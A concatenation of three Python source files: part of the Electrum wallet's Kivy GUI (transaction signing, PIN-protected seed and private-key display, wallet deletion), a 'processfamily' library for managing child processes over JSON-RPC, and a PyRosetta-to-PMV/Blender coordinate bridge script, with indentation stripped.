if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
__init__.py
|
# -*- coding: utf-8 -*-
__author__ = 'matth'
import threading
import traceback
import sys
import subprocess
import time
import uuid
import logging
import json
import argparse
import shlex
import os
import jsonrpc
import Queue
import pkgutil
from processfamily.threads import stop_threads
from processfamily.processes import kill_process, set_processor_affinity, cpu_count
import signal
import functools
if sys.platform.startswith('win'):
import win32job
import win32api
import win32security
from processfamily import win32Popen
else:
import prctl
logger = logging.getLogger("processfamily")
def start_child_process(child_process_instance):
host = _ChildProcessHost(child_process_instance)
host.run()
def _traceback_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception(exc_info[0], exc_info[1], exc_info[2]))
def _exception_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
class ChildProcess(object):
"""
Subclass this for the implementation of the child process. You must also include an appropriate main entry point.
You should do something like this in your implementation:
if __name__ == '__main__':
start_child_process(MyChildProcess())
"""
def init(self):
"""
Do any initialisation. The parent will wait for this to be complete before considering the process to be
running.
"""
def run(self):
"""
Method representing the thread's activity. You may override this method in a subclass.
This will be called from the processes main method, after initialising some other stuff.
"""
def stop(self, timeout=None):
"""
Will be called from a new thread. The process should do its best to shutdown cleanly if this is called.
:param timeout The number of milliseconds that the parent process will wait before killing this process.
"""
class _ArgumentParser(argparse.ArgumentParser):
def exit(self, status=0, message=None):
pass
def error(self, message):
raise ValueError(message)
class _ChildProcessHost(object):
def __init__(self, child_process):
self.child_process = child_process
self.command_arg_parser = _ArgumentParser(description='Execute an RPC method on the child')
self.command_arg_parser.add_argument('method')
self.command_arg_parser.add_argument('--id', '-i', dest='json_rpc_id')
self.command_arg_parser.add_argument('--params', '-p', dest='params')
self._started_event = threading.Event()
self._stopped_event = threading.Event()
self.dispatcher = jsonrpc.Dispatcher()
self.dispatcher["stop"] = self._respond_immediately_for_stop
self.dispatcher["wait_for_start"] = self._wait_for_start
self.stdin = sys.stdin
sys.stdin = open(os.devnull, 'r')
self.stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
self._stdout_lock = threading.RLock()
self._sys_in_thread = threading.Thread(target=self._sys_in_thread_target)
self._sys_in_thread.setDaemon(True)
self._should_stop = False
def run(self):
#This is in the main thread
try:
self._sys_in_thread.start()
try:
if self._should_stop:
return
self.child_process.init()
finally:
self._started_event.set()
if self._should_stop:
return
self.child_process.run()
except Exception as e:
logger.error("Error: %s\n%s", e, _traceback_str())
raise
finally:
self._stopped_event.set()
def _wait_for_start(self):
self._started_event.wait()
return 0
def _sys_in_thread_target(self):
should_continue = True
while should_continue:
try:
line = self.stdin.readline()
if not line:
should_continue = False
else:
try:
should_continue = self._handle_command_line(line)
except Exception as e:
logger.error("Error handling processfamily command on input: %s\n%s", e, _traceback_str())
except Exception as e:
logger.error("Exception reading input for processfamily: %s\n%s", e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
self._should_stop = True
self._started_event.wait(1)
threading.Thread(target=self._stop_thread_target).start()
self._stopped_event.wait(3)
#Give her ten seconds to stop
#This will not actually stop the process from terminating as this is a daemon thread
time.sleep(10)
#Now try and force things
stop_threads()
def _stop_thread_target(self):
try:
self.child_process.stop()
except Exception as e:
logger.error("Error handling processfamily stop command: %s\n%s", e, _traceback_str())
def _respond_immediately_for_stop(self):
logger.info("Received stop instruction from parent process")
self._should_stop = True
return 0
def _send_response(self, rsp):
if rsp:
if '\n' in rsp:
raise ValueError('Invalid response string (new lines are not allowed): "%r"' % rsp)
with self._stdout_lock:
logger.debug("Sending response: %s", rsp)
self.stdout.write("%s\n"%rsp)
self.stdout.flush()
def _handle_command_line(self, line):
try:
line = line.strip()
if not line.startswith('{'):
args = self.command_arg_parser.parse_args(shlex.split(line))
request = {
'jsonrpc': '2.0',
'method': args.method,
}
if args.json_rpc_id:
request['id'] = args.json_rpc_id
if args.params:
request['params'] = args.params
line = json.dumps(request)
else:
request = json.loads(line)
request_id = json.dumps(request.get("id"))
except Exception as e:
logger.error("Error parsing command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": -32700, "message": "Parse error"}, "id": null}')
return True
if request.get('method') == 'stop':
#I have to process the stop method in this thread!
#This is a bit lame - but I'm just using this to form a valid response and send it immediately
#
self._dispatch_rpc_call(line, request_id)
return False
else:
#Others should be processed from a new thread:
threading.Thread(target=self._dispatch_rpc_call_thread_target, args=(line, request_id)).start()
return True
def _dispatch_rpc_call(self, line, request_id):
try:
rsp = jsonrpc.JSONRPCResponseManager.handle(line, self.dispatcher)
if rsp is not None:
self._send_response(rsp.json)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": 32603, "message": "Error handling request"}, "id": %s}'%request_id)
def _dispatch_rpc_call_thread_target(self, line, request_id):
try:
self._dispatch_rpc_call(line, request_id)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
class _ChildProcessProxy(object):
"""
A proxy to the child process that can be used from the parent process
"""
def __init__(self, process_instance, echo_std_err, child_index, process_family):
self.process_family = process_family
self.child_index = child_index
self.comms_strategy = process_family.CHILD_COMMS_STRATEGY
self.name = self.process_family.get_child_name(child_index)
self._process_instance = process_instance
self._rsp_queues_lock = threading.RLock()
self._rsp_queues = {}
self._stdin_lock = threading.RLock()
self.echo_std_err = echo_std_err
if self.echo_std_err:
self._sys_err_thread = threading.Thread(target=self._sys_err_thread_target)
self._sys_err_thread.start()
if self.comms_strategy:
self._sys_out_thread = threading.Thread(target=self._sys_out_thread_target)
self._sys_out_thread.start()
def send_command(self, command, timeout, params=None):
response_id = str(uuid.uuid4())
try:
self._send_command_req(response_id, command, params=params)
return self._wait_for_response(response_id, timeout)
finally:
self._cleanup_queue(response_id)
def _send_command_req(self, response_id, command, params=None):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
self._rsp_queues[response_id] = Queue.Queue()
cmd = {
"method": command,
"id": response_id,
"jsonrpc": "2.0"
}
if params is not None:
cmd["params"] = params
req = json.dumps(cmd)
if '\n' in req:
raise ValueError('Invalid request string (new lines are not allowed): "%r"' % req)
try:
with self._stdin_lock:
self._process_instance.stdin.write("%s\n" % req)
self._process_instance.stdin.flush()
if command == 'stop':
#Now close the stream - we are done
self._process_instance.stdin.close()
except Exception as e:
if self._process_instance.poll() is None:
#The process is running, so something is wrong:
raise
def _wait_for_response(self, response_id, timeout):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return None
q = self._rsp_queues.get(response_id, None)
if q is None:
return None
try:
if timeout <= 0:
return q.get_nowait()
else:
return q.get(True, timeout)
except Queue.Empty as e:
return None
def _cleanup_queue(self, response_id):
with self._rsp_queues_lock:
if self._rsp_queues is not None:
self._rsp_queues.pop(response_id, None)
def _sys_err_thread_target(self):
while True:
try:
line = self._process_instance.stderr.readline()
if not line:
break
try:
self.process_family.handle_sys_err_line(self.child_index, line)
except Exception as e:
logger.error("Error handling %s stderr output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stderr output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stderr closed")
def _sys_out_thread_target(self):
try:
while True:
try:
line = self._process_instance.stdout.readline()
if not line:
break
try:
if self.comms_strategy == CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL:
self._handle_response_line(line)
else:
self.process_family.handle_sys_out_line(line)
except Exception as e:
logger.error("Error handling %s stdout output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stdout output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stdout closed - expecting termination")
start_time = time.time()
while self._process_instance.poll() is None and time.time() - start_time < 5:
time.sleep(0.1)
if self.echo_std_err:
self._sys_err_thread.join(5)
if self._process_instance.poll() is None:
logger.error("Stdout stream closed for %s, but process is not terminated (PID:%s)", self.name, self._process_instance.pid)
else:
logger.info("%s terminated (return code: %d)", self.name, self._process_instance.returncode)
finally:
#Unstick any waiting command threads:
with self._rsp_queues_lock:
for q in self._rsp_queues.values():
if q.empty():
q.put_nowait(None)
self._rsp_queues = None
def _handle_response_line(self, line):
rsp = json.loads(line)
if "id" in rsp:
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
rsp_queue = self._rsp_queues.get(rsp["id"], None)
if rsp_queue is not None:
rsp_queue.put_nowait(rsp)
#We need to keep the job handle in a global variable so that can't go out of scope and result in our process
#being killed
_global_process_job_handle = None
CPU_AFFINITY_STRATEGY_NONE = 0
CPU_AFFINITY_STRATEGY_CHILDREN_ONLY = 1
CPU_AFFINITY_STRATEGY_PARENT_INCLUDED = 2
CHILD_COMMS_STRATEGY_NONE = 0
CHILD_COMMS_STRATEGY_PIPES_CLOSE = 1
CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL = 2
class ProcessFamily(object):
"""
Manages the launching of a set of child processes
"""
ECHO_STD_ERR = False
CPU_AFFINITY_STRATEGY = CPU_AFFINITY_STRATEGY_PARENT_INCLUDED
CLOSE_FDS = True
WIN_PASS_HANDLES_OVER_COMMANDLINE = False
WIN_USE_JOB_OBJECT = True
LINUX_USE_PDEATHSIG = True
NEW_PROCESS_GROUP = True
CHILD_COMMS_STRATEGY = CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL
def __init__(self, child_process_module_name=None, number_of_child_processes=None, run_as_script=True):
self.child_process_module_name = child_process_module_name
self.run_as_script = run_as_script
if self.CPU_AFFINITY_STRATEGY:
self.cpu_count = cpu_count()
if number_of_child_processes:
self.number_of_child_processes = number_of_child_processes
elif self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
self.number_of_child_processes = self.cpu_count-1
else:
self.number_of_child_processes = self.cpu_count
self.child_processes = []
self._child_process_group_id = None
def get_child_process_cmd(self, child_number):
"""
:param child_number zero-indexed
"""
if self.run_as_script:
return [self.get_sys_executable(), self._find_module_filename(self.child_process_module_name)]
else:
return [self.get_sys_executable(), '-m', self.child_process_module_name]
def get_sys_executable(self):
return sys.executable
def get_job_object_name(self):
return "py_processfamily_%s" % (str(uuid.uuid4()))
def get_child_name(self, i):
return 'Child Process %d' % (i+1)
def handle_sys_err_line(self, child_index, line):
sys.stderr.write(line)
def handle_sys_out_line(self, child_index, line):
"""
This is only relevant if CHILD_COMMS_STRATEGY_PIPES_CLOSE is used
"""
pass
def _add_to_job_object(self):
global _global_process_job_handle
if _global_process_job_handle is not None:
#This means that we are creating another process family - we'll all be in the same job
return
if win32job.IsProcessInJob(win32api.GetCurrentProcess(), None):
raise ValueError("ProcessFamily relies on the parent process NOT being in a job already")
#Create a new job and put us in it before we create any children
logger.debug("Creating job object and adding parent process to it")
security_attrs = win32security.SECURITY_ATTRIBUTES()
security_attrs.bInheritHandle = 0
_global_process_job_handle = win32job.CreateJobObject(security_attrs, self.get_job_object_name())
extended_info = win32job.QueryInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation)
extended_info['BasicLimitInformation']['LimitFlags'] = win32job.JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE
win32job.SetInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation, extended_info)
win32job.AssignProcessToJobObject(_global_process_job_handle, win32api.GetCurrentProcess())
logger.debug("Added to job object")
def get_Popen_kwargs(self, i, **kwargs):
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
kwargs['timeout_for_child_stream_duplication_event'] = None
if self.NEW_PROCESS_GROUP:
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
return kwargs
else:
kwargs['preexec_fn'] = functools.partial(self.pre_exec_fn, i)
return kwargs
def get_Popen_class(self):
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Using HandlesOverCommandLinePopen")
return win32Popen.HandlesOverCommandLinePopen
else:
logger.debug("Using ProcThreadAttributeHandleListPopen")
return win32Popen.ProcThreadAttributeHandleListPopen
else:
return subprocess.Popen
def pre_exec_fn(self, i):
#This is called after fork(), but before exec()
#Assign this new process to a new group
if self.NEW_PROCESS_GROUP:
os.setpgrp()
if self.LINUX_USE_PDEATHSIG:
prctl.set_pdeathsig(self.get_pdeath_sig())
def get_pdeath_sig(self):
return signal.SIGKILL
def set_parent_affinity_mask(self):
if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
set_processor_affinity([0])
def set_child_affinity_mask(self, pid, child_index):
i = child_index+1 if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED else child_index
set_processor_affinity([i%self.cpu_count], pid=pid)
def start(self, timeout=30):
if self.child_processes:
raise Exception("Invalid state: start() can only be called once")
s = time.time()
if self.CPU_AFFINITY_STRATEGY:
self.set_parent_affinity_mask()
if sys.platform.startswith('win') and self.WIN_USE_JOB_OBJECT:
self._add_to_job_object()
self.child_processes = []
for i in range(self.number_of_child_processes):
logger.info("Starting %s", self.get_child_name(i))
cmd = self.get_child_process_cmd(i)
logger.debug("Commandline for %s: %s", self.get_child_name(i), json.dumps(cmd))
p = self.get_Popen_class()(
cmd,
**self.get_Popen_kwargs(i,
stdin=subprocess.PIPE if self.CHILD_COMMS_STRATEGY else None,
stdout=subprocess.PIPE if self.CHILD_COMMS_STRATEGY else None,
stderr=(subprocess.PIPE if self.ECHO_STD_ERR else open(os.devnull, 'w')) if self.CHILD_COMMS_STRATEGY else None,
close_fds=self.CLOSE_FDS))
if self.CPU_AFFINITY_STRATEGY and p.poll() is None:
try:
self.set_child_affinity_mask(p.pid, i)
except Exception as e:
logger.error("Unable to set affinity for process %d: %s", p.pid, e)
self.child_processes.append(_ChildProcessProxy(p, self.ECHO_STD_ERR, i, self))
if sys.platform.startswith('win') and self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Waiting for child stream duplication events")
for c in self.child_processes:
c._process_instance.wait_for_child_stream_duplication_event(timeout=timeout-(time.time()-s)-3)
if self.CHILD_COMMS_STRATEGY == CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL:
logger.debug("Waiting for child start events")
responses = self.send_command_to_all("wait_for_start", timeout=timeout-(time.time()-s))
for i, r in enumerate(responses):
if r is None:
if self.child_processes[i]._process_instance.poll() is None:
logger.error(
"Timed out waiting for %s (PID %d) to complete initialisation",
self.get_child_name(i),
self.child_processes[i]._process_instance.pid)
else:
logger.error(
"%s terminated with response code %d before completing initialisation",
self.get_child_name(i),
self.child_processes[i]._process_instance.poll())
logger.info("All child processes initialised")
def stop(self, timeout=30, wait=True):
clean_timeout = timeout - 1
if self.CHILD_COMMS_STRATEGY:
if self.CHILD_COMMS_STRATEGY == CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL:
logger.info("Sending stop commands to child processes")
self.send_command_to_all("stop", timeout=clean_timeout)
elif self.CHILD_COMMS_STRATEGY == CHILD_COMMS_STRATEGY_PIPES_CLOSE:
logger.info("Closing input streams of child processes")
for p in list(self.child_processes):
try:
p._process_instance.stdin.close()
except Exception as e:
logger.warning("Failed to close child process input stream with PID %s: %s\n%s", p._process_instance.pid, e, _traceback_str())
if wait:
self.wait_for_stop_and_then_terminate()
def wait_for_stop_and_then_terminate(self, timeout=30):
clean_timeout = timeout - 1
start_time = time.time()
if self.CHILD_COMMS_STRATEGY:
logger.debug("Waiting for child processes to terminate")
self._wait_for_children_to_terminate(start_time, clean_timeout)
if self.child_processes:
#We've nearly run out of time - let's try and kill them:
logger.info("Attempting to kill child processes")
for p in list(self.child_processes):
try:
kill_process(p._process_instance.pid)
except Exception as e:
logger.warning("Failed to kill child process with PID %s: %s\n%s", p._process_instance.pid, e, _traceback_str())
self._wait_for_children_to_terminate(start_time, timeout)
def _wait_for_children_to_terminate(self, start_time, timeout):
first_run = True
while self.child_processes and (first_run or time.time() - start_time < timeout):
for p in list(self.child_processes):
if p._process_instance.poll() is not None:
self.child_processes.remove(p)
if first_run:
first_run = False
else:
time.sleep(0.1)
def send_command_to_all(self, command, timeout=30, params=None):
start_time = time.time()
response_id = str(uuid.uuid4())
responses = [None]*len(self.child_processes)
try:
for p in self.child_processes:
p._send_command_req(response_id, command, params=params)
for i, p in enumerate(self.child_processes):
time_left = timeout - (time.time() - start_time)
responses[i] = p._wait_for_response(response_id, time_left)
return responses
finally:
for p in self.child_processes:
p._cleanup_queue(response_id)
def _find_module_filename(self, modulename):
"""finds the filename of the module with the given name (supports submodules)"""
loader = pkgutil.find_loader(modulename)
if loader is None:
raise ImportError(modulename)
search_path = loader.get_filename(modulename)
return search_path
|
PyRosetta-PMV.py
|
# Eric Kim
# script to communicate between PyRosetta and PyMol
# run rosetta libraries and this script inside PyMol command-line window
# PyRosetta and PyMol must be built with matching Python versions
# March 2009
# (c) Copyright Rosetta Commons Member Institutions.
# (c) This file is part of the Rosetta software suite and is made available under license.
# (c) The Rosetta software is developed by the contributing members of the Rosetta Commons.
# (c) For more information, see http://www.rosettacommons.org. Questions about this can be
# (c) addressed to University of Washington UW TechTransfer, email: license@u.washington.edu.
# adapted to PMV and Blender by L.AUTIN
#stable version 3/31/2010
#for embeded version:
#c4d execfile("/Library/MGLTools/1.5.6/MGLToolsPckgs/mglutil/hostappli/PyRosetta-PMV.py")
#blender ar ipython run PyRosetta-PMV.py
#for regular version of pmv comment line 21
#import mglutil.hostappli.pdb_c4d as epmv
import sys,os
MGL_ROOT=os.environ['MGL_ROOT']
sys.path[0]=(MGL_ROOT+'lib/python2.5/site-packages')
sys.path.append(MGL_ROOT+'lib/python2.5/site-packages/PIL')
sys.path.append(MGL_ROOT+'/MGLToolsPckgs')
from Pmv.moleculeViewer import EditAtomsEvent
import time
from mglutil import hostappli
####################blender specific###################
import Pmv.hostappInterface.pdb_blender as epmv
import Blender
from Blender import Window, Scene, Draw
self=epmv.start(debug=1)
sc=Blender.Scene.GetCurrent()
#########################################################
plugDir=hostappli.__path__[0]
with_pmv = True
rConf=1
pmv_state = 1
nDecoys=5
def pmv_show(pose,self):
from Pmv.moleculeViewer import EditAtomsEvent
global pmv_state
import time
#if not with_pmv: return
model = self.getMolFromName("test")
model.allAtoms.setConformation(1)
coord = {}
print pose.n_residue(),len(model.chains.residues)
for resi in range(1, pose.n_residue()+1):
res = pose.residue(resi)
resn = pose.pdb_info().number(resi)
#print resi,res.natoms(),len(model.chains.residues[resi-1].atoms)
k=0
for atomi in range(1, res.natoms()+1):
name = res.atom_name(atomi).strip()
if name != 'NV' :
a=model.chains.residues[resi-1].atoms[k]
pmv_name=a.name
k = k + 1
if name != pmv_name :
if name[1:] != pmv_name[:-1]:
print name,pmv_name
else :
coord[(resn, pmv_name)] = res.atom(atomi).xyz()
cood=res.atom(atomi).xyz()
a._coords[1]=[cood.x,cood.y,cood.z]
else :
coord[(resn, name)] = res.atom(atomi).xyz()
cood=res.atom(atomi).xyz()
a._coords[1]=[cood.x,cood.y,cood.z] #return coord
event = EditAtomsEvent('coords', model.allAtoms)
self.dispatchEvent(event)
